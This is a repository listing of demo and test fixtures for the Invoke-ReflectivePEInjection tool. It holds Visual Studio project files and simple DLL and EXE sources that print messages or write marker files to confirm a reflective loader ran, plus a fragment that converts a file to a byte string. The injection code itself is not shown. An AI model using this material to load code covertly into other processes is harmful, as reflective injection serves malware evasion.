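[Byte[]]$Bytes = [System.IO.File]::ReadAllBytes($ResolvedPath)

# -join renders each byte as its decimal value with no trailing separator and
# avoids the quadratic cost of appending one byte at a time to a string.
$ByteStr = $Bytes -join ","

return $ByteStr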
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL/DemoDLL.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 11.00
3 | # Visual Studio 2010
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL", "DemoDLL\DemoDLL.vcxproj", "{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.Build.0 = Debug|Win32
16 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.ActiveCfg = Debug|x64
17 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.Build.0 = Debug|x64
18 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.ActiveCfg = Release|Win32
19 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.Build.0 = Release|Win32
20 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.ActiveCfg = Release|x64
21 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL/DemoDLL/DemoDLL.cpp:
--------------------------------------------------------------------------------
1 | // DemoDLL.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include "DemoDLL.h"
6 |
7 | using namespace std;
8 |
9 |
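// Demo export: returns a NUL-terminated copy of a fixed message.
// Ownership: the buffer is allocated with new[] and is the caller's to free
// with delete[]; nothing in this DLL releases it.
extern "C" __declspec( dllexport ) char* StringFunc()
{
	// Write through an ostream* so the same code can be pointed at cout
	// (outputStream = &cout) when debugging locally. The stream is a local
	// now; the previous version new'd it and never deleted it.
	ostringstream stringStream;
	ostream *outputStream = &stringStream;

	(*outputStream) << "String DLL function is working" << endl << endl;

	// Copy into a buffer that outlives this call; the stream and its
	// string are destroyed on return.
	string output = stringStream.str();
	char* out = new char[output.size() + 1];
	output.copy(out, output.size());
	out[output.size()] = '\0';

	return out;
}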
32 |
// Demo export with no return value: prints a fixed line to stdout, which is
// only visible when the hosting process has a console the caller can see.
extern "C" __declspec( dllexport ) void VoidFunc()
{
	fputs("Void DLL function is working, using printf to display. You will only see this if you run locally.\n\n", stdout);
}
38 |
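// Demo export: returns a NUL-terminated wide copy of a fixed message.
// Ownership: the buffer is allocated with new[] and is the caller's to free
// with delete[]; nothing in this DLL releases it.
extern "C" __declspec( dllexport ) wchar_t* WStringFunc()
{
	// Write through a wostream* so the same code can be pointed at wcout
	// (outputStream = &wcout) when debugging locally. The stream is a local
	// now; the previous version new'd it and never deleted it, and also
	// assigned &wcout only to overwrite it immediately.
	wostringstream stringStream;
	wostream *outputStream = &stringStream;

	(*outputStream) << L"WString DLL function is working" << endl << endl;

	// Copy into a buffer that outlives this call; the stream and its
	// string are destroyed on return.
	wstring output = stringStream.str();
	wchar_t* out = new wchar_t[output.size() + 1];
	output.copy(out, output.size());
	out[output.size()] = L'\0';

	return out;
}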
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL/DemoDLL/DemoDLL.h:
--------------------------------------------------------------------------------
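// The following ifdef block is the standard way of creating macros which make exporting
// from a DLL simpler. All files within this DLL are compiled with the DEMODLL_EXPORTS
// symbol defined on the command line. This symbol should not be defined on any project
// that uses this DLL. This way any other project whose source files include this file see
// DEMODLL_API functions as being imported from a DLL, whereas this DLL sees symbols
// defined with this macro as being exported.
#ifdef DEMODLL_EXPORTS
#define DEMODLL_API __declspec(dllexport)
#else
#define DEMODLL_API __declspec(dllimport)
#endif

// Kept for existing consumers that rely on it; the declarations below do
// not need it.
using namespace std;

// Exported demo entry points. They go through DEMODLL_API so the DLL build
// (DEMODLL_EXPORTS is set by the project) exports them while a consumer that
// includes this header imports them; the previous declarations hard-coded
// dllexport and bypassed the macro defined above.
//
// StringFunc and WStringFunc return buffers allocated with new[] that the
// caller owns and must release with delete[].
extern "C" DEMODLL_API char* StringFunc();
extern "C" DEMODLL_API void VoidFunc();
extern "C" DEMODLL_API wchar_t* WStringFunc();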
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL/DemoDLL/DemoDLL.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}
23 | Win32Proj
24 | DemoDLL
25 |
26 |
27 |
28 | DynamicLibrary
29 | true
30 | Unicode
31 | v120
32 |
33 |
34 | DynamicLibrary
35 | true
36 | Unicode
37 | v120
38 |
39 |
40 | DynamicLibrary
41 | false
42 | true
43 | Unicode
44 | v120
45 |
46 |
47 | DynamicLibrary
48 | false
49 | true
50 | Unicode
51 | v120
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | true
71 |
72 |
73 | true
74 |
75 |
76 | false
77 |
78 |
79 | false
80 |
81 |
82 |
83 | Use
84 | Level3
85 | Disabled
86 | WIN32;_DEBUG;_WINDOWS;_USRDLL;DEMODLL_EXPORTS;%(PreprocessorDefinitions)
87 |
88 |
89 | Windows
90 | true
91 |
92 |
93 |
94 |
95 | Use
96 | Level3
97 | Disabled
98 | WIN32;_DEBUG;_WINDOWS;_USRDLL;DEMODLL_EXPORTS;%(PreprocessorDefinitions)
99 |
100 |
101 | Windows
102 | true
103 |
104 |
105 |
106 |
107 | Level3
108 | Use
109 | MaxSpeed
110 | true
111 | true
112 | WIN32;NDEBUG;_WINDOWS;_USRDLL;DEMODLL_EXPORTS;%(PreprocessorDefinitions)
113 |
114 |
115 | Windows
116 | true
117 | true
118 | true
119 |
120 |
121 |
122 |
123 | Level3
124 | Use
125 | MaxSpeed
126 | true
127 | true
128 | WIN32;NDEBUG;_WINDOWS;_USRDLL;DEMODLL_EXPORTS;%(PreprocessorDefinitions)
129 | MultiThreaded
130 |
131 |
132 | Windows
133 | true
134 | true
135 | true
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 | false
150 | false
151 |
152 |
153 |
154 |
155 | false
156 | false
157 |
158 |
159 |
160 |
161 |
162 |
163 | Create
164 | Create
165 | Create
166 | Create
167 |
168 |
169 |
170 |
171 |
172 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL/DemoDLL/DemoDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL/DemoDLL/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : DemoDLL Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoDLL DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoDLL application.
9 |
10 |
11 | DemoDLL.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoDLL.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoDLL.cpp
25 | This is the main DLL source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoDLL.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL/DemoDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
// DLL entry point. Every loader notification (process and thread attach and
// detach) is a no-op; the loader is always told initialization succeeded.
// hModule and lpReserved are accepted for the required signature only.
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
	(void)hModule;
	(void)lpReserved;
	// DLL_PROCESS_ATTACH, DLL_THREAD_ATTACH, DLL_THREAD_DETACH and
	// DLL_PROCESS_DETACH all take the same (empty) path.
	(void)ul_reason_for_call;

	return TRUE;
}
19 |
20 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL/DemoDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL/DemoDLL/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 |
18 |
19 |
20 | // TODO: reference additional headers your program requires here
21 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL/DemoDLL/targetver.h:
--------------------------------------------------------------------------------
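#pragma once

// Including SDKDDKVer.h defines the highest available Windows platform.

// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.

// The header name below was lost when this listing was rendered; it is the
// one the comment above refers to.
#include <SDKDDKVer.h>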
9 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL_RemoteProcess", "DemoDLL_RemoteProcess\DemoDLL_RemoteProcess.vcxproj", "{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.Build.0 = Debug|Win32
16 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.ActiveCfg = Debug|x64
17 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.Build.0 = Debug|x64
18 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.ActiveCfg = Release|Win32
19 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.Build.0 = Release|Win32
20 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.ActiveCfg = Release|x64
21 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.cpp:
--------------------------------------------------------------------------------
1 | // DemoDLL_RemoteProcess.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 |
6 | using namespace std;
7 |
8 | extern "C" __declspec( dllexport ) void VoidFunc();
9 |
10 |
// Demo export: records that it was called by dropping a marker file under a
// fixed directory on the system drive. Directory creation and the open are
// best-effort (a stream that failed to open silently discards the write),
// which is acceptable only because this is a test fixture.
extern "C" __declspec( dllexport ) void VoidFunc()
{
	_mkdir("c:\\ReflectiveLoaderTest");

	ofstream marker("c:\\ReflectiveLoaderTest\\DllVoidFunction.txt");
	marker << "Dll Void function successfully called.\n";
	marker.close();
}
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}
23 | Win32Proj
24 | DemoDLL_RemoteProcess
25 |
26 |
27 |
28 | DynamicLibrary
29 | true
30 | v120
31 | Unicode
32 |
33 |
34 | DynamicLibrary
35 | true
36 | v120
37 | Unicode
38 |
39 |
40 | DynamicLibrary
41 | false
42 | v120
43 | true
44 | Unicode
45 |
46 |
47 | DynamicLibrary
48 | false
49 | v120
50 | true
51 | Unicode
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | true
71 |
72 |
73 | true
74 |
75 |
76 | false
77 |
78 |
79 | false
80 |
81 |
82 |
83 | Use
84 | Level3
85 | Disabled
86 | WIN32;_DEBUG;_WINDOWS;_USRDLL;DEMODLL_REMOTEPROCESS_EXPORTS;%(PreprocessorDefinitions)
87 | true
88 |
89 |
90 | Windows
91 | true
92 |
93 |
94 |
95 |
96 | Use
97 | Level3
98 | Disabled
99 | WIN32;_DEBUG;_WINDOWS;_USRDLL;DEMODLL_REMOTEPROCESS_EXPORTS;%(PreprocessorDefinitions)
100 | true
101 |
102 |
103 | Windows
104 | true
105 |
106 |
107 |
108 |
109 | Level3
110 | Use
111 | MaxSpeed
112 | true
113 | true
114 | WIN32;NDEBUG;_WINDOWS;_USRDLL;DEMODLL_REMOTEPROCESS_EXPORTS;%(PreprocessorDefinitions)
115 | true
116 |
117 |
118 | Windows
119 | true
120 | true
121 | true
122 |
123 |
124 |
125 |
126 | Level3
127 | Use
128 | MaxSpeed
129 | true
130 | true
131 | WIN32;NDEBUG;_WINDOWS;_USRDLL;DEMODLL_REMOTEPROCESS_EXPORTS;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Windows
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 | false
152 | false
153 |
154 |
155 |
156 |
157 | false
158 | false
159 |
160 |
161 |
162 |
163 |
164 |
165 | Create
166 | Create
167 | Create
168 | Create
169 |
170 |
171 |
172 |
173 |
174 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : DemoDLL_RemoteProcess Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoDLL_RemoteProcess DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoDLL_RemoteProcess application.
9 |
10 |
11 | DemoDLL_RemoteProcess.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoDLL_RemoteProcess.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoDLL_RemoteProcess.cpp
25 | This is the main DLL source file.
26 |
27 | When created, this DLL does not export any symbols. As a result, it
28 | will not produce a .lib file when it is built. If you wish this project
29 | to be a project dependency of some other project, you will either need to
30 | add code to export some symbols from the DLL so that an export library
31 | will be produced, or you can set the Ignore Input Library property to Yes
32 | on the General property page of the Linker folder in the project's Property
33 | Pages dialog box.
34 |
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 |
38 | StdAfx.h, StdAfx.cpp
39 | These files are used to build a precompiled header (PCH) file
40 | named DemoDLL_RemoteProcess.pch and a precompiled types file named StdAfx.obj.
41 |
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 |
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
4 | using namespace std;
5 |
// DLL entry point. On process attach it drops a marker file so a test harness
// can confirm DllMain ran; thread attach/detach and process detach are
// ignored. Always reports success to the loader.
// NOTE(review): DllMain runs while the loader holds its lock; doing
// filesystem work here is tolerable for a test fixture but is not a pattern
// to copy into real DLLs.
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
	(void)hModule;
	(void)lpReserved;

	if (ul_reason_for_call == DLL_PROCESS_ATTACH)
	{
		// Best-effort: neither the mkdir result nor the open is checked, and
		// a stream that failed to open discards the write silently.
		_mkdir("c:\\ReflectiveLoaderTest");
		ofstream marker("c:\\ReflectiveLoaderTest\\DllMain.txt");
		marker << "DllMain successfully called.\n";
		marker.close();
	}

	return TRUE;
}
28 |
29 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoDLL_RemoteProcess.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 |
18 |
19 | // TODO: reference additional headers your program requires here
20 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/targetver.h:
--------------------------------------------------------------------------------
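#pragma once

// Including SDKDDKVer.h defines the highest available Windows platform.

// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.

// The header name below was lost when this listing was rendered; it is the
// one the comment above refers to.
#include <SDKDDKVer.h>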
9 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MD", "DemoExe_MD\DemoExe_MD.vcxproj", "{F674A5CE-F75F-4035-90AB-46DEBC670282}"
5 | EndProject
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MDd", "DemoExe_MDd\DemoExe_MDd.vcxproj", "{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Win32 = Debug|Win32
11 | Debug|x64 = Debug|x64
12 | Release|Win32 = Release|Win32
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.ActiveCfg = Debug|Win32
17 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.Build.0 = Debug|Win32
18 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.ActiveCfg = Debug|x64
19 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.Build.0 = Debug|x64
20 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.ActiveCfg = Release|Win32
21 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.Build.0 = Release|Win32
22 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.ActiveCfg = Release|x64
23 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.Build.0 = Release|x64
24 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.ActiveCfg = Debug|Win32
25 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.Build.0 = Debug|Win32
26 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.ActiveCfg = Debug|x64
27 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.Build.0 = Debug|x64
28 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.ActiveCfg = Release|Win32
29 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.Build.0 = Release|Win32
30 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.ActiveCfg = Release|x64
31 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.Build.0 = Release|x64
32 | EndGlobalSection
33 | GlobalSection(SolutionProperties) = preSolution
34 | HideSolutionNode = FALSE
35 | EndGlobalSection
36 | EndGlobal
37 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MD/DemoExe_MD.cpp:
--------------------------------------------------------------------------------
1 | // DemoExe.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
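// Console entry point for the loader demo: echoes argc and argv so a harness
// can verify that the arguments it passed in arrived intact.
// Returns 0 unconditionally.
int _tmain(int argc, _TCHAR* argv[])
{
	printf("Exe loaded! Printing argc and argv\n\n");

	printf("Argc: %d\n", argc);
	// %p is the conversion defined for pointers; the previous %d was
	// undefined behaviour and truncated the address on 64-bit builds.
	printf("ArgvAddress: %p\n", (void*)argv);

	// _tprintf/_T match _TCHAR in both Unicode and MBCS builds, whereas
	// wprintf(L"%s") is only correct when _TCHAR is wchar_t.
	for (int i = 0; i < argc; i++)
	{
		_tprintf(_T("Argv: %s\n"), argv[i]);
	}

	printf("Exiting exe\n");

	return 0;
}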
25 |
26 |
27 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {F674A5CE-F75F-4035-90AB-46DEBC670282}
23 | Win32Proj
24 | DemoExe_MD
25 |
26 |
27 |
28 | Application
29 | true
30 | v110
31 | Unicode
32 |
33 |
34 | Application
35 | true
36 | v110
37 | Unicode
38 |
39 |
40 | Application
41 | false
42 | v110
43 | true
44 | Unicode
45 |
46 |
47 | Application
48 | false
49 | v110
50 | true
51 | Unicode
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | true
71 |
72 |
73 | true
74 |
75 |
76 | false
77 |
78 |
79 | false
80 |
81 |
82 |
83 | Use
84 | Level3
85 | Disabled
86 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
87 | true
88 | MultiThreadedDLL
89 |
90 |
91 | Console
92 | true
93 |
94 |
95 |
96 |
97 | Use
98 | Level3
99 | Disabled
100 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
101 | true
102 | MultiThreadedDLL
103 |
104 |
105 | Console
106 | true
107 |
108 |
109 |
110 |
111 | Level3
112 | Use
113 | MaxSpeed
114 | true
115 | true
116 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
117 | true
118 |
119 |
120 | Console
121 | true
122 | true
123 | true
124 |
125 |
126 |
127 |
128 | Level3
129 | Use
130 | MaxSpeed
131 | true
132 | true
133 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
134 | true
135 |
136 |
137 | Console
138 | true
139 | true
140 | true
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 | Create
154 | Create
155 | Create
156 | Create
157 |
158 |
159 |
160 |
161 |
162 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/Invoke-ReflectivePEInjection/DemoExe/DemoExe_MD/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : DemoExe_MD Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoExe_MD application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
